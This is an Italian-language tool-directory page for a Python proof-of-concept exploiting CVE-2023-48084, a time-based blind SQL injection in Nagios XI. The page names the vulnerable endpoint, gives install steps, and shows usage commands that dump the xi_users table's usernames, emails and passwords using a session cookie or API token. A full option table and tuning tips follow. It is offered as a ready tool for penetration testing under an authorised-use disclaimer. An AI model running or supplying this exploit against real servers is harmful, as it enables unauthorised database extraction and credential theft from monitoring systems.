Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-48084-Revised — PoC in Python che sfrutta SQLi blind basata sul tempo in Nagios XI per estrarre il contenuto del database, con estrazione multithread tramite ricerca binaria e selezione CLI di schema/tabella/colonna. | Kitploit
Strumenti/GitHubGitHub/metthk/cve-2023-48084-revised
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration TestingSicurezza dei Database
GitHubmetthk/cve-2023-48084-revised

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-48084-Revised

PoC in Python che sfrutta SQLi blind basata sul tempo in Nagios XI per estrarre il contenuto del database, con estrazione multithread tramite ricerca binaria e selezione CLI di schema/tabella/colonna.

Vedi Repository
10 giorni faNon ancora revisionato

CVE-2023-48084 — PoC aggiornato

Repository: MettHK/CVE-2023-48084-Revised

Versione aggiornata di Hamibubu/CVE-2023-48084 con multithreading, estrazione tramite ricerca binaria e flag CLI per la selezione di database / tabella / colonna.

Non è il repository originale. Si tratta di un PoC derivato/migliorato. Il merito del lavoro originale va a Hamibubu.

Disclaimer

Solo per test di sicurezza autorizzati e uso didattico. Non utilizzare questo strumento contro sistemi che non possiedi o per cui non hai esplicita autorizzazione a testare. Gli autori e i contributori non sono responsabili per un uso improprio.

Sulla vulnerabilità

CVE-2023-48084: Nagios XI precedente alla versione 5.11.3 contiene una vulnerabilità di SQL injection nello strumento di modifica in blocco.

Questo PoC sfrutta una SQL injection blind basata sul tempo su:

root@kitploit:~
/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SQL)

Serve un cookie di sessione non admin valido (nagiosxi) oppure un token API.

Modifiche rispetto all'originale

Requisiti

  • Python 3.8+
  • requests (richiesto)
  • pwntools (opzionale; output di avanzamento migliore)
root@kitploit:~
git clone https://github.com/MettHK/CVE-2023-48084-Revised.git
cd CVE-2023-48084-Revised
pip install -r requirements.txt

Utilizzo

root@kitploit:~
# Interattivo (scopri schemi → tabelle → colonne)
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -c '<cookie>'
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -a '<api_token>'

# Percorso rapido: database + tabella + colonne note
python3 CVE-2023-48084.py \
  -u https://target.example/nagiosxi \
  -c '<cookie>' \
  -d nagiosxi \
  -t xi_users \
  -C username,email,password \
  -w 15 \
  --delay 1.2

Sconsiglio di usare più di 2 worker poiché potresti ottenere risultati errati

Opzioni

Suggerimenti

  • Caratteri errati / risultati rumorosi → aumenta --delay (es. 2) o riduci -w (es. 5).
  • Target stabile e veloce → prova più worker (-w 15–20).
  • Preferisci -d / -t / -C quando conosci già lo schema del target per evitare lunghe fasi di scoperta.
Scarica lo strumento
AreaCosa è cambiato
EstrazioneRicerca binaria per lunghezza stringa e caratteri ASCII (molte meno richieste)
PrestazioniEstrazione dei caratteri multithread (-w / --workers)
CLI-d / --database — salta la scoperta dello schema
CLI-t / --table — salta la scoperta della tabella (richiede -d)
CLI-C / --columns — colonne separate da virgola, salta la scoperta delle colonne (richiede -t)
Temporizzazione--delay, --threshold, --max-length configurabili
RobustezzaSessioni HTTP per thread; pwntools opzionale (barre di avanzamento) con fallback semplice
DocumentazioneCrediti/collegamento all'originale; nessun hostname di laboratorio o artefatti CTF negli esempi
FlagDescrizione
-u / --urlURL di base (es. https://target.example/nagiosxi)
-c / --cookieValore del cookie di sessione nagiosxi
-a / --apiKeyToken API (non usare insieme a -c)
-d / --databaseNome dello schema/database (salta l'enumerazione dello schema)
-t / --tableNome della tabella (salta l'enumerazione della tabella; richiede -d)
-C / --columnsColonne separate da virgola (salta l'enumerazione delle colonne; richiede -t)
-w / --workersThread paralleli (default: 10)
--delaySecondi di SLEEP sul ramo vero (default: 1.5)
--thresholdTempo di risposta minimo per considerarlo un hit (default: delay * 0.8)
--max-lengthLimite superiore per la ricerca binaria della lunghezza (default: 2048)